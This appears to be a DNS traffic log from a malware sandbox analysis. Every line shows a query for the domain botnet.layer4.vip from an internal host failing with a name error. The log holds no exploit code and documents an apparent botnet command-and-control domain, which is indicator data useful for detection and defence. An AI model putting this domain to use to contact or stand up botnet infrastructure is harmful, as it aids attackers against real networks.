                                  Apr 9, 2023 03:31:53.586762905 CEST8.8.8.8192.168.2.230x8255Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.643018007 CEST8.8.8.8192.168.2.230x18f1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.658544064 CEST8.8.8.8192.168.2.230x18f1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.700102091 CEST8.8.8.8192.168.2.230x4d71Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.805114985 CEST8.8.8.8192.168.2.230xf387Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.829631090 CEST8.8.8.8192.168.2.230xf387Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.870031118 CEST8.8.8.8192.168.2.230xf387Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.886817932 CEST8.8.8.8192.168.2.230xf387Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.951400042 CEST8.8.8.8192.168.2.230x15f9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.966878891 CEST8.8.8.8192.168.2.230x15f9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:53.983340979 CEST8.8.8.8192.168.2.230x15f9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.032275915 CEST8.8.8.8192.168.2.230xaf90Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.072197914 CEST8.8.8.8192.168.2.230xaf90Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.089113951 CEST8.8.8.8192.168.2.230xaf90Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.115016937 CEST8.8.8.8192.168.2.230xd423Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.231889963 CEST8.8.8.8192.168.2.230x1fcdName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.256325006 CEST8.8.8.8192.168.2.230x1fcdName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.287636042 CEST8.8.8.8192.168.2.230x1fcdName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.312652111 CEST8.8.8.8192.168.2.230x1fcdName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.368226051 CEST8.8.8.8192.168.2.230xca87Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.399785042 CEST8.8.8.8192.168.2.230xca87Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.439927101 CEST8.8.8.8192.168.2.230xaf4fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.495906115 CEST8.8.8.8192.168.2.230xaf4fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.551548004 CEST8.8.8.8192.168.2.230x7778Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.592473030 CEST8.8.8.8192.168.2.230x7778Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.632683039 CEST8.8.8.8192.168.2.230xcc10Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.656874895 CEST8.8.8.8192.168.2.230xcc10Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.681092978 CEST8.8.8.8192.168.2.230xcc10Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.697664976 CEST8.8.8.8192.168.2.230xcc10Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.721858978 CEST8.8.8.8192.168.2.230x293fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.737660885 CEST8.8.8.8192.168.2.230x293fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.833159924 CEST8.8.8.8192.168.2.230x3883Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.857687950 CEST8.8.8.8192.168.2.230x3883Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.889413118 CEST8.8.8.8192.168.2.230x3883Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.913921118 CEST8.8.8.8192.168.2.230xb8c7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.929824114 CEST8.8.8.8192.168.2.230xb8c7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.954240084 CEST8.8.8.8192.168.2.230xb8c7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:54.978283882 CEST8.8.8.8192.168.2.230xb8c7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.033639908 CEST8.8.8.8192.168.2.230x5f96Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.097937107 CEST8.8.8.8192.168.2.230x5f96Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.113595009 CEST8.8.8.8192.168.2.230xe87dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.178477049 CEST8.8.8.8192.168.2.230xe87dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.194442987 CEST8.8.8.8192.168.2.230xe87dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.323530912 CEST8.8.8.8192.168.2.230xa0a2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.347480059 CEST8.8.8.8192.168.2.230xa0a2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.451741934 CEST8.8.8.8192.168.2.230x43e8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.507900000 CEST8.8.8.8192.168.2.230x43e8Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.587596893 CEST8.8.8.8192.168.2.230x6e7fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.619179964 CEST8.8.8.8192.168.2.230x17d0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.698926926 CEST8.8.8.8192.168.2.230x17d0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.723459005 CEST8.8.8.8192.168.2.230x9ca9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.819540977 CEST8.8.8.8192.168.2.230x5d5bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.875211000 CEST8.8.8.8192.168.2.230x5d5bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.916079044 CEST8.8.8.8192.168.2.230x2e87Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:55.940474033 CEST8.8.8.8192.168.2.230x2e87Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.004524946 CEST8.8.8.8192.168.2.230x2e87Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.029061079 CEST8.8.8.8192.168.2.230x947bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.285068035 CEST8.8.8.8192.168.2.230x43b2Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.324810028 CEST8.8.8.8192.168.2.230x872cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.342849970 CEST8.8.8.8192.168.2.230x872cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.398952961 CEST8.8.8.8192.168.2.230x872cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.488167048 CEST8.8.8.8192.168.2.230x6da3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.512288094 CEST8.8.8.8192.168.2.230x6da3Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.536534071 CEST8.8.8.8192.168.2.230x8fe5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.600539923 CEST8.8.8.8192.168.2.230x8fe5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.624644041 CEST8.8.8.8192.168.2.230x8fe5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.640491009 CEST8.8.8.8192.168.2.230xfe63Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.656421900 CEST8.8.8.8192.168.2.230xfe63Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.680984974 CEST8.8.8.8192.168.2.230xfe63Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.696824074 CEST8.8.8.8192.168.2.230xfe63Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.712366104 CEST8.8.8.8192.168.2.230xfe63Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.728354931 CEST8.8.8.8192.168.2.230x709fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.744189024 CEST8.8.8.8192.168.2.230x709fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.760040998 CEST8.8.8.8192.168.2.230x709fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.784200907 CEST8.8.8.8192.168.2.230x709fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.808351040 CEST8.8.8.8192.168.2.230x709fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.824379921 CEST8.8.8.8192.168.2.230x18f9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.848498106 CEST8.8.8.8192.168.2.230x18f9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.966516018 CEST8.8.8.8192.168.2.230x5599Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.982125044 CEST8.8.8.8192.168.2.230x5599Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:56.997984886 CEST8.8.8.8192.168.2.230xdb48Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.046735048 CEST8.8.8.8192.168.2.230xdb48Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.086720943 CEST8.8.8.8192.168.2.230xdb48Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.111196995 CEST8.8.8.8192.168.2.230xb127Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.135590076 CEST8.8.8.8192.168.2.230xb127Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.159940958 CEST8.8.8.8192.168.2.230xb127Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.233194113 CEST8.8.8.8192.168.2.230x78c1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.248683929 CEST8.8.8.8192.168.2.230x78c1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.264213085 CEST8.8.8.8192.168.2.230x78c1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.304097891 CEST8.8.8.8192.168.2.230x78c1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.359869003 CEST8.8.8.8192.168.2.230xa98dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.384094954 CEST8.8.8.8192.168.2.230xa98dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.473613977 CEST8.8.8.8192.168.2.230x5b74Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.520808935 CEST8.8.8.8192.168.2.230xa3deName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.545283079 CEST8.8.8.8192.168.2.230xa3deName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.560899973 CEST8.8.8.8192.168.2.230xa3deName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.610014915 CEST8.8.8.8192.168.2.230xa3deName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.634229898 CEST8.8.8.8192.168.2.230xac39Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.674299955 CEST8.8.8.8192.168.2.230xac39Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.738797903 CEST8.8.8.8192.168.2.230x1439Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.754292965 CEST8.8.8.8192.168.2.230x1439Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.785785913 CEST8.8.8.8192.168.2.230x1439Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.850459099 CEST8.8.8.8192.168.2.230x961Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.874536991 CEST8.8.8.8192.168.2.230x961Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.899079084 CEST8.8.8.8192.168.2.230x961Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.971360922 CEST8.8.8.8192.168.2.230xf62dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:57.986896038 CEST8.8.8.8192.168.2.230xf62dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.027101040 CEST8.8.8.8192.168.2.230xf0ebName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.042799950 CEST8.8.8.8192.168.2.230xf0ebName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.074321032 CEST8.8.8.8192.168.2.230xf0ebName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.155594110 CEST8.8.8.8192.168.2.230x9835Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.245287895 CEST8.8.8.8192.168.2.230xd6e1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.269826889 CEST8.8.8.8192.168.2.230xd6e1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.285698891 CEST8.8.8.8192.168.2.230xd6e1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.325887918 CEST8.8.8.8192.168.2.230x782eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.351005077 CEST8.8.8.8192.168.2.230x782eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.399662018 CEST8.8.8.8192.168.2.230x782eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.459651947 CEST8.8.8.8192.168.2.230xc9baName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.499785900 CEST8.8.8.8192.168.2.230xc9baName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.515767097 CEST8.8.8.8192.168.2.230xc9baName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.556009054 CEST8.8.8.8192.168.2.230x29e5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.611548901 CEST8.8.8.8192.168.2.230x29e5Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.627789021 CEST8.8.8.8192.168.2.230x296cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.667968988 CEST8.8.8.8192.168.2.230x296cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.692733049 CEST8.8.8.8192.168.2.230x296cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.757834911 CEST8.8.8.8192.168.2.230x3254Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.806174040 CEST8.8.8.8192.168.2.230x3254Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.822630882 CEST8.8.8.8192.168.2.230x3254Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.862749100 CEST8.8.8.8192.168.2.230xec15Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.886842012 CEST8.8.8.8192.168.2.230xec15Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.928121090 CEST8.8.8.8192.168.2.230xec15Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:58.960016966 CEST8.8.8.8192.168.2.230x377Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.032579899 CEST8.8.8.8192.168.2.230x7f41Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.081839085 CEST8.8.8.8192.168.2.230x7f41Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.113643885 CEST8.8.8.8192.168.2.230x7f41Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.129384995 CEST8.8.8.8192.168.2.230x5950Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.153958082 CEST8.8.8.8192.168.2.230x5950Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.178414106 CEST8.8.8.8192.168.2.230x5950Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.194078922 CEST8.8.8.8192.168.2.230x5950Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.234723091 CEST8.8.8.8192.168.2.230x26aaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.259063005 CEST8.8.8.8192.168.2.230x26aaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.372117043 CEST8.8.8.8192.168.2.230xb17dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.396557093 CEST8.8.8.8192.168.2.230xb17dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.436862946 CEST8.8.8.8192.168.2.230xb17dName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.509521961 CEST8.8.8.8192.168.2.230xf493Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.525615931 CEST8.8.8.8192.168.2.230xf493Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.541219950 CEST8.8.8.8192.168.2.230xf493Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.565431118 CEST8.8.8.8192.168.2.230x3ce9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.606872082 CEST8.8.8.8192.168.2.230x3ce9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.631527901 CEST8.8.8.8192.168.2.230x3ce9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.671936989 CEST8.8.8.8192.168.2.230xfeddName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.687962055 CEST8.8.8.8192.168.2.230xfeddName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.703598976 CEST8.8.8.8192.168.2.230xfeddName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.749744892 CEST8.8.8.8192.168.2.230xfeddName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.773969889 CEST8.8.8.8192.168.2.230xdbdbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.822510958 CEST8.8.8.8192.168.2.230xdbdbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.846906900 CEST8.8.8.8192.168.2.230xdbdbName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.878348112 CEST8.8.8.8192.168.2.230x3196Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.918565035 CEST8.8.8.8192.168.2.230x3196Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.934448004 CEST8.8.8.8192.168.2.230x3196Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:59.974658966 CEST8.8.8.8192.168.2.230x9bbeName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.113126993 CEST8.8.8.8192.168.2.230xd3deName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.177596092 CEST8.8.8.8192.168.2.230x481Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.209377050 CEST8.8.8.8192.168.2.230x481Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.265670061 CEST8.8.8.8192.168.2.230xfc56Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.290195942 CEST8.8.8.8192.168.2.230xfc56Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.338921070 CEST8.8.8.8192.168.2.230xfc56Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.363352060 CEST8.8.8.8192.168.2.230xfc56Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.387912035 CEST8.8.8.8192.168.2.230xb68bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.473028898 CEST8.8.8.8192.168.2.230xb68bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.488517046 CEST8.8.8.8192.168.2.230xab41Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.528858900 CEST8.8.8.8192.168.2.230xab41Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.569093943 CEST8.8.8.8192.168.2.230xab41Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.585158110 CEST8.8.8.8192.168.2.230x4e28Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.600970984 CEST8.8.8.8192.168.2.230x4e28Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.722559929 CEST8.8.8.8192.168.2.230xf0fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.763290882 CEST8.8.8.8192.168.2.230xf0fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.819408894 CEST8.8.8.8192.168.2.230x8a38Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.946939945 CEST8.8.8.8192.168.2.230x27f4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.962765932 CEST8.8.8.8192.168.2.230x27f4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:00.995150089 CEST8.8.8.8192.168.2.230xadd4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.019649029 CEST8.8.8.8192.168.2.230xadd4Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.123151064 CEST8.8.8.8192.168.2.230x7a79Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.163134098 CEST8.8.8.8192.168.2.230x7a79Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.203879118 CEST8.8.8.8192.168.2.230xad26Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:32:01.268322945 CEST8.8.8.8192.168.2.230xad26Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
